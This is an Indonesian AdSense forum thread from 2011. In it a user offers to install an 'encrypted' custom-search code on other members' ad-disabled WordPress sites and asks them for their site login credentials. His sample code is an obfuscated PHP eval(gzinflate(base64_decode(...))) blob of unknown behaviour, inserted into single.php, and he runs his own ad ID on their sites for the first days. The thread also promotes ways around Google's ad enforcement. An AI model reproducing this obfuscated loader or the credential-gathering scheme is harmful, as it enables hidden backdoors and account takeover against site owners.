1. Halo Guest, pastikan Anda selalu menaati peraturan forum sebelum mengirimkan post atau thread baru.

Gratis CSE Code Untuk GA Domain Disable

Discussion in 'Bengkel AdSense' started by randi, May 10, 2011.

1. randi

randi Ads.id Pro

Halo bro ...
    Selama 2-3 bulan terakhir ini si mbah G, sedang datang bulan, gampang marah dan tanpa pandang bulu.
    Bukan cuma blog Robot yang kena GA Domain Disable (tidak boleh tayang iklan GA), blog manual pun banyak yang kena.

Nah untuk GA Domain Disable (bukan deindex) hanya ada 3 solusi yang bisa diambil:
    1. Mendapatkan penghasilan dari alternatif iklan selain GA.
    2. Menjadikannya Adsense For Domain (AFD)
    3. Menggunakan Custome Search Engine (CSE).

Nah dari pengamatan ane selama ini, yang paling bagus dari ke 3 alternatif tersebut adalah menggunakan CSE.

Kita semua bisa menggunakan code CSE yang sudah beredar, tapi masalahnya code CSE tersebut tidak bisa auto inject keyword dan muncul iklan untuk menghasilkan dolar.

Nah di sini ane punya code CSE yang bisa inject keyword sehingga bisa muncul iklan.

Tapi mohon maaf sebelumnya code tersebut tidak bisa saya share disini, karena code tersebut masih dalam tahap penyempurnaan.

Sudah lama saya menggunakan code ini dan aman, tidak menyebabkan disable account dan bisa payout seperti biasa.

Ada Super Hero Ads-Id yang sudah memakai code ini (PM ane untuk tahu namanya) saya blom minta ijin untuk mempublikasikan IDnya secara langsung.
    Kata beliau penghasilannya cukup lumayan diatas alternatif 1, dan dari statistik penghasilan yg beliau bisikan, dari satu domain disable tersebut
    bisa 2 kali lebih dari minimal PO setiap bulan. Cocok dengan statistik Domain Disable yang ane miliki dan juga dipasang CSE.

Lalu dari sana ane jadi pengen bantu temen2 di ads-id yang kena disable domain dan sedikit riset.
    Ane akan pasangkan code CSE gratis pada domain disable.
    Dengan syarat :
    1. Saya yang memasang CSE di domain disable.
    2. Saya hanya memasang di single.php.
    3. Code saya encrypt.
    4. Code tidak bisa dipindah ke domain yang lain.
    5. Memberitahukan lewat PM nama domain, dan tolong saya minta id login.
    6. Memberitahukan statistik hasil lewat PM sebagai bahan riset. *Edited aturan dirubah baca dibawah.

Code yang saya encrypt hanya perintah untuk memfilter key saja, sedangkan CSE Codenya tidak saya encrypt sehingga tidak melanggar TOS.
    Jadi saya bersumpah tidak menyisipkan perintah apapun yang bisa merugikan pemilik domain atau pun perintah yang menguntungkan saya.

Silahkan master2 yang bisa mendecrypt code tersebut saya perbolehkan, hanya saja tolong jangan publikasikan codenya, silahkan untuk kepentingan sendiri.
    Karena saya memang tidak membuat full protection, hal ini untuk menghindari beratnya loading page dan merugikan pemilik domain.

Saya juga tidak akan mengotak-atik semua isi domain, ataupun menyabotase apapun isinya.
    Terus terang saya hanya ingin mengetahui manfaat CSE ini dan ingin meriset apa yang menyebabkan si Big G mendisable domain2.

Lalu datanya akan saya akan laporkan hasilnya pada teman2 yang ikut berpartisipasi dalam project ini.
    Maaf untuk sementara tertutup untuk umum, saya berjanji akan saya buka hasilnya nanti setelah semua datanya komplit.

Untuk pertama saya akan buka 10 sukarelawan yang ingin mendapatkan code CSE hasil oprekan saya ini.
    Tentu saja mereka akan mendapatkan laporan hasil dari riset ini, sehingga sama2 bermanfaat.

Contoh code yang disisipkan seperti ini :
    -----------------------------------------

<?php eval(stripslashes(gzinflate(base64_decode("DZRHD6NWAIT/ympPG3GgmqJks6KZYkx91EtEx/jRMe3Xx3MdjTSHme/Pv//8GZvxR7ml8Neyzq9xgenSlMuv+nr1FUzX8leWLiVN/VeU+VCUv35KCdDbyQx5XkAT4PVt+9p3zNKftfZM5rAhnDMSnyeiRK+FQTZQeMgItqgnSRQBdoRNXAvQ+vPxLluwhwDnM3bCtQP2NHMPbplYdzZyUhupnwhSrYiX0VahMsNwtq8DVMxkYvly2jFWmahsftJs4cvxjgq6j82e1gndldV42oTCsSnnjvVCpEN7D2qDd9WW3XxlTPQnycIgL5fk/kmyYGC99bYwTOvkEVnH86TjC1Rr1cZWbtRcBHrn/eZ2vI6askv4+YwlNJo9pztei7t/Mw3xca2LN4dcjtN2eVpJB2p2Ynl9BmxUvBIM70Z2RzwPH1c1owrGivddLXF7sugZe5YUeQpiKz7yhcwJ8JhbxtfSymU7qLejcXCbMDePg0CNjjBoj5vvMiVbvrDgcXiuKDaIDLPV5lYVH+xub/EIPFx6mPgRNZM369ujq8u1JuG3QPH1dVHs/JanoovtFviGV9q+4gKblpglzOzS1cZCOlnONmbFsgPTHqkvTqN0QpFJnPI7j3PY+7gtsTvyemIqAt6+hS+nHoMtdcxOJ0iVhY3YX1shy5XIy5+NBu6RKnbfy9f53sOeokVtRigQqDLsH/OUWBd+Rq0pKlcbBy1plwlkwXTTJ1RXnHlr9U0+8eOsRWE90bTYYDt6ogNSWmGjFBBGHGcLAqWhV8bNer+byj5iIiteB9Fl67xlfhcjji3ljHQ9OhYZK7vyny9aKKhb5+yQ2eMYehRmU13kr+kIOV7dlzB0LoWMIttp8o/EWxZtE5dEahkrvRzVVqAwEhFisfx+y5ThE7YgzRVcNEWkFFjWJ+z7XYJMnT3SN6A1gqxwIuxaLYLD+WpCI7yVz4QpPXS58ak/C6xr5Nq40YbN8hkHYFgKxBTOJn8mTXVwCnKqOsXMeKQwkOGzNxYZcfA0bT0Efr9yS2L3hRpUjiIykqOG+GGc4ymwnGvmQ9K16kpm2gdv2r42bUnTYsOefZ2ywlPk9+Gkmh0/45zW56GbY+Cq4YrmaYf6p6LgM8Xf/mIq/bmyy3mv8uqAplOgUpJrmDLvEqSZDaQknC5F+hCY7fSaRre/YLQi2IPXptg1mO4CYEdfIo7ezSSEb9wQyqDePCAFzn2zOE7h6LofOVsj/LO798///rq7x9/vpT+Hw==")))); ?>

<script src="http://www.google.com/jsapi"></script>
    <script type="text/javascript">
    google.load('search', '1');
    function OnLoad() {
    // Create a custom search control that uses a CSE restricted to code.google.com
    var customSearchControl = new google.search.CustomSearchControl('XXXXXXXXXXXXXXXXXXXXX');

// Draw the control in content div
    customSearchControl.draw('searchresult');

// run a query
    customSearchControl.execute(<?php echo $key ?>);
    }
    google.setOnLoadCallback(OnLoad);
    </script>
    <div id="searchresult">Loading...</div>

Mungkin ada yang khawatir ataupun takut account GAnya di ban atau disable.
    Dari pengalaman saya sampai saat ini account GA tidak akan diban (disable account), tapi saya tidak bisa menjamin 100% karena mungkin diwaktu mendatang algoritma ataupun peraturan big G akan berubah.
    Bila anda ingin ikutan mencoba CSE ini tapi ragu Accoung GA Diban, saya akan dengan sukarela dan senang hati menggunakan ID CSE milik saya :gembira: :gembira:
    Saya akan jamin penghasilan dari CSE ini tidak akan mengecewakan.

Saya mengerti akan banyak yang pesimis dan mungkin tidak setuju dengan cara yang saya tempuh.
    Tapi tolong dimengerti ini sebuah riset yang hasilnya akan saya bagikan dan saling menguntungkan bagi semua member Ads-ID.

Segala masukan akan saya terima dengan lapang dada. Bila semua tidak menyetujui cara ini, saya akan segera hapus thread ini. Terimakasih.

-------------* Edited

Agar data yang didapat lebih akurat maka untuk syarat no 6 yaitu memberitahukan hasil statistik lewat PM, saya merubah sedikit aturan ini.
    Saya akan pasang CSE dengan ID CSE punya saya selama 3 hari pertama, data ini saya akan catat untuk laporan (nanti semua yang berpartisipasi akan mendapatkan hasil laporan secara tertulis), setelah itu diganti dengan ID CSE anda untuk seumur hidup.

-------------------

Yang sudah berpartisipasi dengan Project ini :
    1. Marbolec
    2. Ebooktops
    3. Sariful
    4. 340web
    Terimakasih yang sebesar2nya buat bro yang diatas. Silahkan masih ada 6 slot untuk ikut project ini sebelum nanti akan ditutup.

Last edited: May 10, 2011
  2. adsensemania

adsensemania Ads.id Pro

share caranya om..

3. TheNext

TheNext Super Hero

harus PM ya Om?

4. sariful

sariful Super Hero

Boleh ikutan PM kang... mau coba juga nich CSE Code na.. kebetulan ada 4 domain yang mantan... :hmm: kalo boleh pasti saya :gembira: menerimanya

5. randi

randi Ads.id Pro

Iya bro lewat PM biar domainnya tidak tersebar
    Thanks mau ikut. :gembira: :gembira:

6. Schwarzkophf

Schwarzkophf Super Hero

itu kodenya om? :pusing:
    diselipin dmn? :hmm:

7. randi

randi Ads.id Pro

Caranya sudah ane share disini bro : http://www.adsense-id.com/forums/showthread.php/75428-Share-Mensiasati-bila-web-di-ban-GA-(2)

Silahkan di baca.

---------- Post added at 03:43 AM ---------- Previous post was at 03:40 AM ----------

Itu contoh code, tapi bukan itu yang disisipin bro, karena itu buat domain yang lain, sedangkan masing2 domain akan mendapat code khusus.
    Code disimpan di single.php sebelum content.

8. cahyo.yw

cahyo.yw Ads.id Starter

untuk trepik blog minimal berapa pren ?
    kalo trepik dikit kan ga ada $$$ nya :D

9. randi

randi Ads.id Pro

Bebas gan, semakin besar traffic otomatis pendapatan juga semakin tinggi.

10. godhonk.ijo

godhonk.ijo Super Hero

kalo blogspot custom domain bisa ikutan gak?
    sp tau bs, sy minat, haha., kalo domain sih gak ke banned, tp bahasa indonesia ??, :D

11. randi

randi Ads.id Pro

Maaf untuk sementara saya fokuskan dulu untuk disable domain ya.
    Nanti berikutnya saya akan coba untuk non disable.
    Thanks atas minatnya. Bro bisa PM ane nanti untuk di data.

12. rozysmd

rozysmd Ads.id Pro

bro ane mau ikutan pasang juga ane pm ya

13. randi

randi Ads.id Pro

Ok bro.

Share This Page